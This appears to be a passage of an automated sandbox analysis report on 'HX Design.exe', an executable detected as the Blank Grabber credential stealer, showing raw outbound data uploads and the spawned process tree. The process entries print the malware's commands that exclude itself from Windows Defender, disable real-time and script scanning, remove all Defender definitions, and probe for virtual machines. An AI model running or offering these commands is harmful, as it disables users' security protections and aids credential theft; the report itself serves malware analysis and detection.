                                                                                                                                                                                                                                                    2024-12-21 04:57:40 UTC16384OUTData Raw: 46 a8 ad fd dc 0f 5e bf 84 e4 4f 8c cc 72 fc 7b 5c b9 e6 ce 90 a7 94 fa 57 0d ed bf 9f b3 01 b2 43 05 4b c6 1e 71 46 73 f9 dc 3d 46 5b 93 71 90 74 1c a0 01 a3 f4 1f e8 68 1b 02 0f 7e 99 bc f9 30 a5 18 15 1d 6f 3b ba a7 80 cd 77 77 21 eb 36 fb b7 97 de 28 00 3b 0d 9b 3f 5e 00 f9 7e 70 75 c8 bb 36 d7 42 61 e9 41 62 41 6c b7 3a 7f c4 f4 6a 4b 6b 05 32 0a f6 32 01 54 b9 29 b4 99 a9 e4 22 66 3f f0 f2 b2 fb 3a 76 bc 6f bd 71 6e 86 da 90 0a e7 bc bb 65 be 69 e5 e8 2b 33 3f a3 dd 75 1c 1c 36 99 9e a3 24 01 8b d6 6c ec a2 14 0c 52 ba 6f f0 82 b4 08 b5 41 9f c9 4b e5 ac 7b 29 a3 26 32 3f d4 bb e9 3e 03 09 ec 30 89 1c 77 9d 85 d1 db c1 21 9b 28 6f 25 7f 70 f4 ee ca e4 0e 51 ca d7 41 9a 7f d1 81 d8 d4 40 f6 69 a0 58 9e 1a e5 8c d1 39 63 a2 12 55 e0 b5 63 2f 64 7f fe
                                                                                                                                                                                                                                                    Data Ascii: F^Or{\WCKqFs=F[qth~0o;ww!6(;?^~pu6BaAbAl:jKk22T)"f?:voqnei+3?u6$lRoAK{)&2?>0w!(o%pQA@iX9cUc/d
                                                                                                                                                                                                                                                    2024-12-21 04:57:40 UTC16384OUTData Raw: bb d3 42 57 1d c5 9e 4f 1f 48 86 75 8d ff 78 54 25 68 b3 e5 ed 17 95 d4 a8 00 ce 9f 93 3b 40 90 9e 8b eb 32 7a 8f e7 97 f5 a1 7d ab f9 f7 65 34 20 77 21 b6 a7 70 e6 d7 61 12 3c 60 aa 7d fe 2c 49 0d a2 3e 12 74 64 59 ce e6 1a 16 5b 4f d4 60 dc 4c 64 ec 77 17 bd 95 a0 8f 75 c8 39 fd 24 58 1a 72 c3 30 01 d9 7d 50 93 40 85 cb 53 85 32 56 31 2b b8 0f 15 2b 59 e0 af aa 61 b0 07 fa e8 ce 5b d8 e0 c7 74 ee 0c 47 ee 9c e6 eb bd 09 a7 94 f7 e4 5b 15 bc 46 c4 7e f5 94 c1 5b 74 2d 0d d8 f3 0d f1 06 15 ed 8d d2 95 7b cc 67 cb 21 92 20 da 7d a6 f1 b5 73 a3 5b fd be 87 b6 27 04 cb 4e 62 a7 96 14 90 4a 6b 0f ce fd 63 02 c7 aa 16 bf bb 53 52 e4 aa 7f 7b 1c 2c ee 9e 6c 9e 96 6b 6f 9a 01 ef e1 a2 ff 40 a4 44 10 69 f3 49 34 7d 41 6f 1e 5d 4e 8e 2c 96 45 e3 17 9c 52 c2 96 c7
                                                                                                                                                                                                                                                    Data Ascii: BWOHuxT%h;@2z}e4 w!pa<`},I>tdY[O`Ldwu9$Xr0}P@S2V1++Ya[tG[F~[t-{g! }s['NbJkcSR{,lko@DiI4}Ao]N,ER
                                                                                                                                                                                                                                                    2024-12-21 04:57:40 UTC16384OUTData Raw: 18 b8 97 b7 4e 60 54 86 b5 41 72 ff 1a 74 03 dc 1a 55 27 08 53 0d 46 bd 59 44 a4 42 91 a6 1d 2a cb f3 08 b2 d6 9a 7e 80 d9 af 84 19 d9 e1 97 19 37 f9 15 9d 5d 71 64 f1 8b 45 2b 85 af c2 1b 7f 7f ab e2 0b d7 24 34 0f 6b da f9 bb f9 b3 94 45 aa bb 40 c6 38 c4 71 48 da 11 10 12 7d b3 ef 39 a2 36 00 57 02 2d 21 bc ff 46 83 97 03 84 43 de c4 b5 98 75 67 ec f5 1e 59 f5 f3 58 6c b5 1d 85 a7 87 36 de 7d 31 b3 a9 59 bd f9 64 23 5f 56 b3 3b fb ae 74 04 c2 12 f6 fe 11 a8 3c b9 43 53 9b 7c cd 55 39 01 0e 3e 7a cc 45 d6 14 1e 1c b4 86 8b f6 48 66 49 30 0a a8 70 4b 28 52 fa dc 44 60 8c 47 8a 6a 4f e9 8a d7 bf e1 ad be 33 25 c9 ef d6 7f 47 88 37 65 68 ad 7f fc 16 41 dc f1 09 d2 e6 d7 eb c8 21 0d c0 9a 12 c5 17 c4 fd 46 c3 9a 7e 2c 4f 60 5c 49 8c 49 4e ca 09 33 84 ee c1
                                                                                                                                                                                                                                                    Data Ascii: N`TArtU'SFYDB*~7]qdE+$4kE@8qH}96W-!FCugYXl6}1Yd#_V;t<CS|U9>zEHfI0pK(RD`GjO3%G7ehA!F~,O`\IIN3
                                                                                                                                                                                                                                                    2024-12-21 04:57:40 UTC16384OUTData Raw: 04 c9 21 ff 36 ac e2 0b 54 82 6b 20 dd bb 2b a5 4e ab 7f 5d 82 7e 3d f2 5a 2e 4f 98 67 ab dc 06 67 05 b8 01 f7 ce 8c 97 07 cc 37 e9 dc ef 77 ff af 82 44 38 40 20 e8 81 e9 88 b5 48 0f 6d 47 bc 05 88 a0 02 8d 30 ff 35 e9 53 a6 a2 82 3a a4 8b e6 c9 46 ed d3 11 45 00 e3 11 db 20 c6 e6 24 1f b8 59 d2 69 78 ad cb 61 f3 1d 30 98 9c 91 1c 2d 4c 7b 3b d7 18 06 bc 81 37 40 ef 2a b2 47 1d 43 88 29 a2 e1 f2 53 18 74 12 83 a3 6f 17 a4 61 03 31 16 8c b7 66 81 72 07 56 60 3a 60 0e c4 ee 7f 84 e8 ff 22 72 8b 14 9c 06 38 f7 15 cc cc ac 41 73 8e e0 24 7d d5 d7 5d 79 54 3d 63 d5 b4 4b df 0b 70 8c d5 59 65 e6 20 34 34 df 01 62 c2 f4 af a6 16 e2 c4 8a d0 a5 10 bc 0a 5d 9c 9a b1 d8 b9 bc c3 e1 e2 85 bd 05 5b f4 08 ea c8 c4 15 0d 04 f6 3a f0 be 2d 9c 5d c1 5c 81 02 25 fe 40 8a
                                                                                                                                                                                                                                                    Data Ascii: !6Tk +N]~=Z.Ogg7wD8@ HmG05S:FE $Yixa0-L{;7@*GC)Stoa1frV`:`"r8As$}]yT=cKpYe 44b][:-]\%@
                                                                                                                                                                                                                                                    2024-12-21 04:57:40 UTC16384OUTData Raw: b8 f8 fd ba 06 14 9e 27 ae b4 aa 22 b7 18 3f d2 82 ab 21 d5 28 8f 8a e8 27 ac 44 d0 3a cf fc bf be 59 86 4e fa 88 06 da 30 1b b0 48 dd a1 98 94 41 30 3c 8e 0c f3 52 97 84 40 2a 9c 38 47 19 a1 8f 90 71 34 7b 35 68 8f bc f4 e7 c9 50 d8 43 fe 89 31 f0 10 0d 0d d1 23 83 77 ab 3d ba 9c e5 15 3c ea 8b eb 88 2c 29 f5 e3 47 ac 0f ce 89 b4 94 eb ed 99 e0 0d ae 56 5a d4 b0 fb e3 07 cc c4 9b 51 f0 0b 2a 94 a4 52 33 1b 7e f4 b3 fa d1 87 9a 00 e6 44 e3 f9 cd 00 99 c0 ff 27 c8 9f fc be 6c 83 2d f4 5d 33 00 69 a4 46 93 da 28 64 35 94 07 6d d8 e3 5b be 24 a7 94 7f 6b b3 00 bb 2c c8 17 8a 6c 96 8f e5 67 1b 3b 9e 59 e6 62 36 73 1b b1 c1 28 93 dd 9c 30 33 ed b3 7a c1 44 20 08 f0 b4 95 b3 ed 72 37 ea 86 9d ff a7 a7 9a 44 71 55 7e 63 aa 0e d4 74 3a 36 33 e1 c8 7f cc 38 10 8f
                                                                                                                                                                                                                                                    Data Ascii: '"?!('D:YN0HA0<R@*8Gq4{5hPC1#w=<,)GVZQ*R3~D'l-]3iF(d5m[$k,lg;Yb6s(03zD r7DqU~ct:638
                                                                                                                                                                                                                                                    2024-12-21 04:57:40 UTC16384OUTData Raw: 2e 85 e4 10 43 5f a0 c6 4b 38 03 a1 6d 0c 79 1a 46 d5 c4 54 b2 42 d6 2b e3 9e 21 3e 5f 76 e1 18 4e f3 bb 4a 5b 2c 45 77 18 86 63 c2 44 03 78 29 8f 2d 81 26 96 ef a8 95 f1 82 dc 6f 67 9e fb 83 59 ca 2d 52 32 33 e1 9c 12 8d 9c 38 a5 90 01 e9 ca 4a cc 7c 37 51 eb 79 00 1c 1b 93 a8 49 7e 32 24 72 b9 f6 f4 a7 d2 b3 3f 28 d7 45 59 19 0a 7b d0 a1 c8 28 c5 f1 42 88 eb 4b 23 dc fc 92 a5 b6 3b e0 b7 e0 a5 d6 98 c1 00 1a d5 90 d6 48 f6 ff 88 92 4f 39 2e 13 17 ed 52 b8 a5 21 b6 d1 6b 13 11 b7 2a a3 83 fe 6b 32 07 64 0e 45 16 e8 10 94 17 e6 f8 23 6f a9 9f e1 72 66 00 77 6b 47 6e 16 66 75 96 be 93 59 b3 37 a6 c2 58 c6 4e f5 2d 4f 79 f3 6a 52 d0 48 2a 34 ca 37 6d a5 f7 70 b6 a1 19 47 a9 c0 48 0b 95 0b b3 95 0f 2a fb c8 1a e1 7b d9 09 08 a1 74 e9 d6 42 90 89 ee 33 c8 73
                                                                                                                                                                                                                                                    Data Ascii: .C_K8myFTB+!>_vNJ[,EwcDx)-&ogY-R238J|7QyI~2$r?(EY{(BK#;HO9.R!k*k2dE#orfwkGnfuY7XN-OyjRH*47mpGH*{tB3s
                                                                                                                                                                                                                                                    2024-12-21 04:57:43 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                                                                    Date: Sat, 21 Dec 2024 04:57:42 GMT
                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                    Content-Length: 1639
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                    Start time:23:56:59
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\HX Design.exe"
                                                                                                                                                                                                                                                    Imagebase:0x7ff732060000
                                                                                                                                                                                                                                                    File size:9'441'536 bytes
                                                                                                                                                                                                                                                    MD5 hash:55933983C78673A3D30C3D7F8BD54B83
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1678275226.000001631A8D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1678275226.000001631A8D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                                                                    Start time:23:57:01
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\HX Design.exe"
                                                                                                                                                                                                                                                    Imagebase:0x7ff732060000
                                                                                                                                                                                                                                                    File size:9'441'536 bytes
                                                                                                                                                                                                                                                    MD5 hash:55933983C78673A3D30C3D7F8BD54B83
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                                    Start time:23:57:06
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                                    Start time:23:57:06
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                                    Start time:23:57:06
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                                    Start time:23:57:06
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                                    Start time:23:57:06
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                    Start time:23:57:06
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                                    Start time:23:57:06
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                                    Start time:23:57:06
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                                    Start time:23:57:06
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                    Imagebase:0x7ff62a660000
                                                                                                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                                    Start time:23:57:06
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'
                                                                                                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                                    Start time:23:57:06
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                                    Start time:23:57:06
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d7c90000
                                                                                                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                                    Start time:23:57:10
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                                    Start time:23:57:10
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                                    Start time:23:57:10
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                                                                                                                                                    Imagebase:0x7ff6416e0000
                                                                                                                                                                                                                                                    File size:77'312 bytes
                                                                                                                                                                                                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                                                    Start time:23:57:10
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                                                    Start time:23:57:11
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                                    Start time:23:57:11
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                                                                                                                                                    Imagebase:0x7ff6416e0000
                                                                                                                                                                                                                                                    File size:77'312 bytes
                                                                                                                                                                                                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                                    Start time:23:57:11
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                                                                                                                                                                    File size:496'640 bytes
                                                                                                                                                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:false
